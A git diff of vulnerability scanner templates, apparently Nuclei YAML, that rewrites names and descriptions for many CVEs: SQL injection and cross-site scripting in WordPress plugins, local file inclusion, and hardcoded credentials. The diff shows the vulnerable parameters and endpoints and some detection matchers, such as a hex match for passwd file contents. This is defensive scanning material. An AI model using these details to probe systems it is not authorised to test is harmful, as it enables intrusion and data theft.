modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445 - https://wordpress.org/plugins/modern-events-calendar-lite/ @@ -34,3 +34,5 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2021/CVE-2021-25099.yaml b/cves/2021/CVE-2021-25099.yaml index ba7d21198a..2dad95879c 100644 --- a/cves/2021/CVE-2021-25099.yaml +++ b/cves/2021/CVE-2021-25099.yaml @@ -1,11 +1,11 @@ id: CVE-2021-25099 info: - name: Give < 2.17.3 - Cross-Site Scripting + name: WordPress GiveWP <2.17.3 - Cross-Site Scripting author: theamanrawat severity: medium description: | - The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting. + WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f - https://wordpress.org/plugins/give/ @@ -36,3 +36,5 @@ requests: - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/cves/2021/CVE-2021-31195.yaml similarity index 100% rename from vulnerabilities/other/ms-exchange-server-reflected-xss.yaml rename to cves/2021/CVE-2021-31195.yaml diff --git a/cves/2021/CVE-2021-35380.yaml b/cves/2021/CVE-2021-35380.yaml index 133aeff3dc..f417f382fc 100644 --- a/cves/2021/CVE-2021-35380.yaml +++ b/cves/2021/CVE-2021-35380.yaml @@ -1,11 +1,11 @@ id: CVE-2021-35380 info: - name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read + name: TermTalk Server 3.24.0.2 - Local File Inclusion author: fxploit severity: high description: | - A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download. + TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve. reference: - https://www.swascan.com/solari-di-udine/ - https://www.exploit-db.com/exploits/50638 @@ -30,3 +30,5 @@ requests: - "fonts" - "extensions" condition: and + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2021/CVE-2021-40661.yaml b/cves/2021/CVE-2021-40661.yaml index 41f98308a1..bf86ea439c 100644 --- a/cves/2021/CVE-2021-40661.yaml +++ b/cves/2021/CVE-2021-40661.yaml @@ -1,15 +1,16 @@ id: CVE-2021-40661 info: - name: IND780 - Directory Traversal + name: IND780 - Local File Inclusion author: For3stCo1d severity: high description: | - A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future. + IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. reference: - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661 - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm + - https://nvd.nist.gov/vuln/detail/CVE-2021-40661 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -38,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index 16cbe81ea0..14a978eb24 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -1,15 +1,15 @@ id: CVE-2021-43421 info: - name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload + name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload author: akincibor severity: critical description: | - A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code. + Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. reference: - https://github.com/Studio-42/elFinder/issues/3429 - - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 - https://twitter.com/infosec_90/status/1455180286354919425 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -50,3 +50,5 @@ requests: regex: - '"hash"\:"(.*?)"\,' internal: true + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml index 171404f3ef..3768381ed0 100644 --- a/cves/2021/CVE-2021-43734.yaml +++ b/cves/2021/CVE-2021-43734.yaml @@ -1,11 +1,11 @@ id: CVE-2021-43734 info: - name: kkFileview v4.0.0 - Directory Traversal + name: kkFileview v4.0.0 - Local File Inclusion author: arafatansari severity: high description: | - kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host. + kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host. reference: - https://github.com/kekingcn/kkFileView/issues/304 - https://nvd.nist.gov/vuln/detail/CVE-2021-43734 @@ -37,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2021/CVE-2021-44451.yaml b/cves/2021/CVE-2021-44451.yaml index 1d944fccd0..8a462097a1 100644 --- a/cves/2021/CVE-2021-44451.yaml +++ b/cves/2021/CVE-2021-44451.yaml @@ -1,11 +1,12 @@ id: CVE-2021-44451 info: - name: Apache Superset - Default Login + name: Apache Superset <=1.3.2 - Default Login author: dhiyaneshDK severity: medium description: | - Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. + Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb @@ -66,3 +67,5 @@ requests: regex: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-0784.yaml b/cves/2022/CVE-2022-0784.yaml index e844a268c8..b34521c73d 100644 --- a/cves/2022/CVE-2022-0784.yaml +++ b/cves/2022/CVE-2022-0784.yaml @@ -1,11 +1,11 @@ id: CVE-2022-0784 info: - name: Title Experiments Free < 9.0.1 - Unauthenticated SQLi + name: WordPress Title Experiments Free <9.0.1 - SQL Injection author: theamanrawat severity: critical description: | - The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection. + WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f - https://wordpress.org/plugins/wp-experiments-free/ @@ -37,3 +37,5 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "{\"images\":")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml index 0e93d86723..f8a96a7566 100644 --- a/cves/2022/CVE-2022-0786.yaml +++ b/cves/2022/CVE-2022-0786.yaml @@ -1,11 +1,11 @@ id: CVE-2022-0786 info: - name: KiviCare < 2.3.9 - Unauthenticated SQLi + name: WordPress KiviCare <2.3.9 - SQL Injection author: theamanrawat severity: critical description: | - The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users. + WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30 - https://wordpress.org/plugins/kivicare-clinic-management-system/ @@ -34,3 +34,5 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml index e3519085a0..3f7127dcdb 100644 --- a/cves/2022/CVE-2022-0826.yaml +++ b/cves/2022/CVE-2022-0826.yaml @@ -1,11 +1,11 @@ id: CVE-2022-0826 info: - name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi + name: WordPress WP Video Gallery <=1.7.1 - SQL Injection author: theamanrawat severity: critical description: | - The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users. + WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5 - https://wordpress.org/plugins/wp-video-gallery-free/ @@ -37,3 +37,5 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "Registred videos :")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml index 02e54bfaec..21a5a6fec2 100644 --- a/cves/2022/CVE-2022-0948.yaml +++ b/cves/2022/CVE-2022-0948.yaml @@ -1,16 +1,16 @@ id: CVE-2022-0948 info: - name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi + name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection author: theamanrawat severity: critical description: | - The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection. + WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576 - https://wordpress.org/plugins/woc-order-alert/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 - https://plugins.trac.wordpress.org/changeset/2707223 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -43,3 +43,5 @@ requests: - 'contains(content_type_1, "application/json")' - 'contains(body_2, "olistener-action.olistener-controller")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 32b10040f4..da9080884e 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1595 info: - name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure + name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure author: theamanrawat severity: medium description: | - The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request. + WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL. reference: - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b - https://wordpress.org/plugins/hc-custom-wp-admin-url/ @@ -38,3 +38,5 @@ requests: - type: status status: - 302 + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-23854.yaml b/cves/2022/CVE-2022-23854.yaml index a959cdbceb..431dfc7406 100644 --- a/cves/2022/CVE-2022-23854.yaml +++ b/cves/2022/CVE-2022-23854.yaml @@ -1,13 +1,14 @@ id: CVE-2022-23854 info: - name: AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal + name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion author: For3stCo1d severity: high description: | - AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com). + AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion. reference: - https://packetstormsecurity.com/files/cve/CVE-2022-23854 + - https://www.aveva.com - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854 - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02 @@ -42,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-26138.yaml b/cves/2022/CVE-2022-26138.yaml index 6bfc107c59..03523083c2 100644 --- a/cves/2022/CVE-2022-26138.yaml +++ b/cves/2022/CVE-2022-26138.yaml @@ -1,16 +1,16 @@ id: CVE-2022-26138 info: - name: Questions For Confluence - Hardcoded Credentials + name: Atlassian Questions For Confluence - Hardcoded Credentials author: HTTPVoid severity: critical description: | - A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. + Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. reference: - https://twitter.com/fluepke/status/1549892089181257729 - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26138 - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26138 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -39,4 +39,6 @@ requests: matchers: - type: dsl dsl: - - 'location == "/httpvoid.action"' \ No newline at end of file + - 'location == "/httpvoid.action"' + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-27593.yaml b/cves/2022/CVE-2022-27593.yaml index 5e9860321f..832e3956fc 100644 --- a/cves/2022/CVE-2022-27593.yaml +++ b/cves/2022/CVE-2022-27593.yaml @@ -1,16 +1,15 @@ id: CVE-2022-27593 info: - name: QNAP QTS Photo Station External Reference + name: QNAP QTS Photo Station External Reference - Local File Inclusion author: allenwest24 severity: critical description: | - An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later + QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later. reference: - https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593 - https://www.qnap.com/en/security-advisory/qsa-22-24 - https://nvd.nist.gov/vuln/detail/CVE-2022-27593 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 @@ -38,4 +37,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-2863.yaml b/cves/2022/CVE-2022-2863.yaml index 06e99e0ce8..19973f146c 100644 --- a/cves/2022/CVE-2022-2863.yaml +++ b/cves/2022/CVE-2022-2863.yaml @@ -1,15 +1,15 @@ id: CVE-2022-2863 info: - name: WordPress WPvivid Backup < 0.9.76 - Local File Inclusion + name: WordPress WPvivid Backup <0.9.76 - Local File Inclusion author: tehtbl severity: medium - description: The plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack. + description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server. reference: - https://seclists.org/fulldisclosure/2022/Oct/0 - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2863 - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-2863 remediation: Upgrade to version 0.9.76 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N @@ -56,3 +56,5 @@ requests: regex: - '"_ajax_nonce":"([0-9a-z]+)"' internal: true + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-31656.yaml b/cves/2022/CVE-2022-31656.yaml index aa0c7698f2..d15ea19969 100644 --- a/cves/2022/CVE-2022-31656.yaml +++ b/cves/2022/CVE-2022-31656.yaml @@ -1,15 +1,14 @@ id: CVE-2022-31656 info: - name: VMware - Authentication Bypass + name: VMware - Local File Inclusion author: DhiyaneshDk severity: critical description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. reference: - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd - https://www.vmware.com/security/advisories/VMSA-2022-0021.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656 - https://nvd.nist.gov/vuln/detail/CVE-2022-31656 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -43,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index 341352b3d0..7c945993a8 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -1,16 +1,14 @@ id: CVE-2022-31793 info: - name: muhttpd <= 1.1.5 - Path traversal + name: muhttpd <=1.1.5 - Local Inclusion author: scent2d severity: high description: | - A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. + muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. reference: - https://derekabdine.com/blog/2022-arris-advisory.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - - https://derekabdine.com/blog/2022-arris-advisory classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -36,3 +34,5 @@ network: encoding: hex words: - "726f6f743a" + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-34121.yaml b/cves/2022/CVE-2022-34121.yaml index d75776a9d4..3f232fdcd0 100644 --- a/cves/2022/CVE-2022-34121.yaml +++ b/cves/2022/CVE-2022-34121.yaml @@ -5,11 +5,11 @@ info: author: edoardottt severity: high description: | - Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php. + Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php. reference: - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates - - https://nvd.nist.gov/vuln/detail/CVE-2022-34121 - https://github.com/CuppaCMS/CuppaCMS/issues/18 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -37,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-35413.yaml b/cves/2022/CVE-2022-35413.yaml index 1d6f9df21a..4aa84e7310 100644 --- a/cves/2022/CVE-2022-35413.yaml +++ b/cves/2022/CVE-2022-35413.yaml @@ -1,15 +1,16 @@ id: CVE-2022-35413 info: - name: Wapples Web Application Firewall - Hardcoded credentials + name: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials author: For3stCo1d severity: critical description: | - WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001. + WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413 - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview + - https://nvd.nist.gov/vuln/detail/CVE-2022-35413 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -53,3 +54,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-36642.yaml b/cves/2022/CVE-2022-36642.yaml index d36b250033..00cfd40bce 100644 --- a/cves/2022/CVE-2022-36642.yaml +++ b/cves/2022/CVE-2022-36642.yaml @@ -1,15 +1,15 @@ id: CVE-2022-36642 info: - name: Omnia MPX 1.5.0+r1 - Path Traversal + name: Omnia MPX 1.5.0+r1 - Local File Inclusion author: arafatansari,ritikchaddha,For3stCo1d severity: critical description: | - A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands. + Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel. reference: - https://www.exploit-db.com/exploits/50996 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642 - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd + - https://nvd.nist.gov/vuln/detail/CVE-2022-36642 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -41,3 +41,5 @@ requests: - '"mustChangePwd":' - '"roleUser":' condition: and + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-37299.yaml b/cves/2022/CVE-2022-37299.yaml index 7dec084180..d643281547 100644 --- a/cves/2022/CVE-2022-37299.yaml +++ b/cves/2022/CVE-2022-37299.yaml @@ -1,14 +1,14 @@ id: CVE-2022-37299 info: - name: Shirne CMS 1.2.0. - Path Traversal + name: Shirne CMS 1.2.0 - Local File Inclusion author: pikpikcu severity: medium - description: Shirne CMS 1.2.0 There is a Path Traversal vulnerability which could cause arbitrary file read via /static/ueditor/php/controller.php + description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php. reference: - https://twitter.com/pikpikcu/status/1568316864690028544 - - https://nvd.nist.gov/vuln/detail/CVE-2022-37299 - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue + - https://nvd.nist.gov/vuln/detail/CVE-2022-37299 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 @@ -38,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-3768.yaml b/cves/2022/CVE-2022-3768.yaml index fb47cd3c5f..dcecc46eae 100644 --- a/cves/2022/CVE-2022-3768.yaml +++ b/cves/2022/CVE-2022-3768.yaml @@ -1,17 +1,17 @@ id: CVE-2022-3768 info: - name: WPSmartContracts < 1.3.12 - Author SQLi + name: WordPress WPSmartContracts <1.3.12 - SQL Injection author: Hardik-Solanki severity: high description: | - The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author + WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 - - https://nvd.nist.gov/vuln/detail/CVE-2022-3768 - https://cve.report/CVE-2022-3768 - remediation: Fixed in version 1.3.12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3768 + remediation: Fixed in version 1.3.12. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -45,3 +45,5 @@ requests: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-38794.yaml b/cves/2022/CVE-2022-38794.yaml index a2ad74156a..9b84d5d12c 100644 --- a/cves/2022/CVE-2022-38794.yaml +++ b/cves/2022/CVE-2022-38794.yaml @@ -5,10 +5,9 @@ info: author: pikpikcu severity: high description: | - Zaver through 2020-12-15 allows directory traversal via the GET /.. substring. + Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. reference: - https://github.com/zyearn/zaver/issues/22 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38794 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N @@ -32,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index 8e50ec6870..66910ece9b 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -1,11 +1,11 @@ id: CVE-2022-4050 info: - name: JoomSport < 5.2.8 - Unauthenticated SQLi + name: WordPress JoomSport <5.2.8 - SQL Injection author: theamanrawat severity: critical description: | - The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f - 